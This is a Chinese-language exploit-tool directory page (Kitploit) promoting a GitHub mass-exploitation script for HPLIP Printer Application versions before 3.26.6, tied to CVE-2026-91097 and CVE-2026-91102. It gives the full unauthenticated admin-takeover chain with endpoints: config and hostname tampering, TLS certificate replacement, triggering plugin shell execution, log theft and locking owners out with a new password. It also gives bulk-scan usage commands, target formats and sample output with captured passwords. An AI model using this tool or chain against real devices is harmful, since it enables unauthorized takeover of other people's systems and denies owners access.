Skip to content
KitploitKITPLOIT
工具漏洞利用博客
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-91097-CVE-2026-91106 — HPLIP < 3.26.6 — 通过 PAPPL Web 界面实现完全管理员接管(无需认证)。与 CVE-2026-91097 至 CVE-2026-91106 相关(CVSS 9.3) | Kitploit
工具/GitHubGitHub/nxploited/cve-2026-91097-cve-2026-91106
防御工具漏洞扫描器漏洞利用Web应用程序漏洞利用信息收集后渗透利用Web安全网络安全渗透测试

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
Payload 开发
GitHubnxploited/cve-2026-91097-cve-2026-91106

CVE-2026-91097-CVE-2026-91106

HPLIP < 3.26.6 — 通过 PAPPL Web 界面实现完全管理员接管(无需认证)。与 CVE-2026-91097 至 CVE-2026-91106 相关(CVSS 9.3)

查看仓库
41天前尚未审核

Affected Auth Impact

🔬 加入 Telegram 获取最新漏洞研究与漏洞利用发布
Telegram


HPLIP 打印机应用程序 — 未认证管理员接管

针对 HPLIP 打印机应用程序(基于 PAPPL 的 Web 界面)的批量利用工具,影响所有 3.26.6 之前的 HPLIP 版本。该工具利用 PAPPL Web 界面的默认未认证状态执行完整的管理员接管链:配置篡改、主机名修改、TLS 证书替换、HP 插件安装(触发在目标上以 shell 执行 .run 文件)、系统日志窃取以及管理员密码锁定。

本工具利用的漏洞

核心漏洞是 PAPPL 未认证管理访问 — HPLIP 打印机应用程序默认未配置密码,允许任何网络攻击者通过 Web 界面(通常为 8000 端口)在无需认证的情况下执行所有管理操作。

此外,插件安装链利用了以下已修复的弱点:

CVECWECVSS 4.0相关性
CVE-2026-91097CWE-94 / CWE-7877.0plugin.spec 中的路径遍历 — 本工具触发的插件安装会经过存在漏洞的 pluginhandler.py 代码
CVE-2026-91102CWE-78 / CWE-4948.4无完整性校验的下载 — 插件 .run 文件通过 HTTP 下载并在目标上以 sh 执行

HP 安全公告:HPSBPI04151

被利用的端点

利用链

root@kitploit:~
目标发现
    │
    ▼
检测 HPLIP 打印机应用程序(Server 头 + 版本)
    │
    ▼
检查认证状态(/security)
    │
    ├── 已设置密码 ──► 记录为 VULN(已锁定)
    │
    └── 无密码(默认)──► 利用链:
            │
            ├── 1. 修改配置(/config)
            │       dns_sd_name、location、organization、contact_name
            │       已验证:标记在响应中回显
            │
            ├── 2. 更改主机名(/network)
            │       捕获旧主机名,设置新主机名
            │       已验证:新值在响应中回显
            │
            ├── 3. 上传 TLS 证书(/tls-install-crt)
            │       自定义 PEM 证书 + 私钥
            │       多部分文件上传
            │
            ├── 4. 安装 HP 插件(/plugin)
            │       步骤 1:POST action=install-plugin(下载 .run)
            │       步骤 2:POST action=license-accepted(以 sh 执行)
            │       ⚠ CVE-2026-91097 + CVE-2026-91102
            │
            ├── 5. 读取日志文件(/logfile.txt)
            │       系统路径、环境信息、Snap 路径
            │
            └── 6. 设置管理员密码(/security)
                    锁定后续未认证访问
                    完成完整管理员接管

安装

root@kitploit:~
pip install requests

需要 Python 3.8+。无其他依赖。

使用方法

命令行

root@kitploit:~
python T.py targets.txt 50
参数描述默认值
targets.txt包含目标列表的文件(每行一个)提示输入
50并发线程数15

交互模式

root@kitploit:~
python T.py

工具将提示输入目标列表文件和线程数。

目标格式

root@kitploit:~
192.168.1.100:8000
https://10.0.0.1:8000
http://printer.local:8000
192.168.1.100
printer.example.com
  • 如果未指定端口,默认为 8000
  • 如果未指定协议,将同时尝试 HTTP 和 HTTPS
  • 重复目标会自动去重
  • 以 # 开头的行将被忽略

输出文件

示例 — AdminS.txt

root@kitploit:~
http://192.168.1.100:8000 | v3.22.10 | password=Nx-zD_buovl6wko0 | server=HPLIP_Printer_Application/3.22.10-13 PAPPL/1.4.9 | panel=http://192.168.1.100:8000/ | security=http://192.168.1.100:8000/security | config=http://192.168.1.100:8000/config | ...

示例 — Nx_modify.txt

root@kitploit:~
http://192.168.1.100:8000/config | v3.22.10 | type=CONFIG | verified=true | dns_sd_name: 'HPLIP Printer Application' -> 'HPLIP [marker]' | location: '' -> 'Nxploited-marker'
http://192.168.1.100:8000/network | v3.22.10 | type=HOSTNAME | verified=true | old=ORIGINAL-HOST.local | new=nx-abc123

控制台输出

root@kitploit:~
  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

   ██████   ██ ██   ██
   ██  ███  ██  ██ ██
   ██   ██████   ███
   ██    █████  ██ ██
   ██     ████ ██   ██

  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  HPLIP 打印机应用程序  │  管理员接管 + 完全控制
  受影响 < 3.26.6  │  PAPPL 未认证访问

  CVE-2026-91097  │  插件路径遍历
  CVE-2026-91102  │  插件下载无完整性校验 + Shell 执行

  通过 Web 利用:  /security /config /network /plugin /tls-install-crt /logs

  作者:Nxploited ( Khaled Alenazi )  │  Telegram: @Kxploit
  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

 targets=4  threads=4

 00:11:34  [CUPS  ]  http://192.168.1.100:8000  Server: HPLIP_Printer_Application/3.22.10-13
 00:11:34  [VER   ]  http://192.168.1.100:8000  v3.22.10 < 3.26.6 AFFECTED
 00:11:35  [PROBE ]  http://192.168.1.100:8000  v3.22.10 | NO AUTH | exploiting...
 00:11:36  [CFG   ]  http://192.168.1.100:8000  CONFIG MODIFIED | marker=abc12345
 00:11:37  [NET   ]  http://192.168.1.100:8000  HOSTNAME 'OLD-HOST.local' -> 'nx-xyz789'
 00:11:38  [CERT  ]  http://192.168.1.100:8000  TLS CERT UPLOADED | marker=abc12345
 00:12:03  [PLG   ]  http://192.168.1.100:8000  PLUGIN | freshly_installed | shell_exec=True
 00:12:05  [LOG   ]  http://192.168.1.100:8000  logfile.txt | 19083B | env=/var/snap/hplip-printer-app/
 00:12:05  [ADMIN ]  http://192.168.1.100:8000  PASSWORD SET | pw=Nx-zD_buovl6wko0
 00:12:05  [HIT   ]  http://192.168.1.100:8000  v3.22.10 + CONFIG + HOSTNAME + CERT + PLUGIN + LOGS + ADMIN

 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 DONE  4/4  █ HIT=4  █ VULN=0  █ SAFE=0  █ SKIP=0

 ▐ 管理员接管: 4  └─ AdminS.txt
 ▐ 修改       : 8  └─ Nx_modify.txt
 ▐ 证书上传   : 4  └─ Nx_upload.txt
 ▐ 插件执行   : 1  └─ Nx_plugin.txt
 ▐ 侦察 / 信息: 8  └─ Nx_recon.txt
 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

目标分类

标签含义
HIT成功利用 — 已实现管理员接管
VULN

技术说明

  • HPLIP 打印机应用程序在基于 Ubuntu 的系统上作为 Snap 包运行,数据存储在 /var/snap/hplip-printer-app/common/ 下
  • PAPPL 框架使用 GnuTLS 进行 TLS 操作(C API,而非 shell 命令)— TLS 证书上传会写入磁盘但不会触发代码执行
  • 插件安装会触发 sh plugin.run --keep --nox11,执行 HP 官方插件二进制文件 — 内容从 HP 服务器下载;攻击者无法控制插件内容,但会触发其执行
  • 该工具为每个目标设置唯一密码以防止重复利用,并记录凭据以供验证
  • 每次配置更改使用随机标记,并在服务器响应中验证以确认修改已应用
  • 无任意 RCE — 该工具不会上传 Web Shell 或注入任意命令;可利用的操作包括管理员接管、配置篡改、证书替换、HP 插件执行和信息泄露

参考资料

  • HP 安全公告 HPSBPI04151
  • NVD — CVE-2026-91097
  • NVD — CVE-2026-91102
  • HPLIP 发行说明
  • PAPPL 框架

作者:Nxploited


⚠️ 免责声明

本工具严格仅供授权的安全研究、渗透测试和教育目的使用。在未获得系统所有者明确书面许可的情况下对系统使用本工具是非法且不道德的。作者对因使用本工具而导致的任何滥用、损害或法律后果不承担任何责任。在进行任何安全评估之前,请务必获得适当授权。使用本工具即表示您同意对自己的行为以及遵守所有适用法律法规承担全部责任。

下载工具
端点操作已验证
/security设置管理员密码(账户接管)✅
/config修改 DNS-SD 名称、位置、组织、联系人✅
/network更改系统主机名✅
/tls-install-crt上传任意 TLS 证书 + 私钥✅
/plugin触发 HP 插件下载 + 接受许可 + 安装(以 sh 执行 .run)✅
/logfile.txt读取完整应用程序日志文件(信息泄露)✅
文件内容
AdminS.txt管理员接管 — 密码、服务器版本、完整面板 URL 映射
Nx_modify.txt已验证的配置和主机名更改(旧值 → 新值)
Nx_upload.txtTLS 证书上传确认
Nx_plugin.txtHP 插件安装结果及 shell 执行状态
Nx_recon.txt信息泄露 — 日志文件大小、环境路径、版本
存在漏洞但已设置密码(已锁定)
SAFE版本 ≥ 3.26.6(已修补)
SKIP非 HPLIP 打印机应用程序或无法访问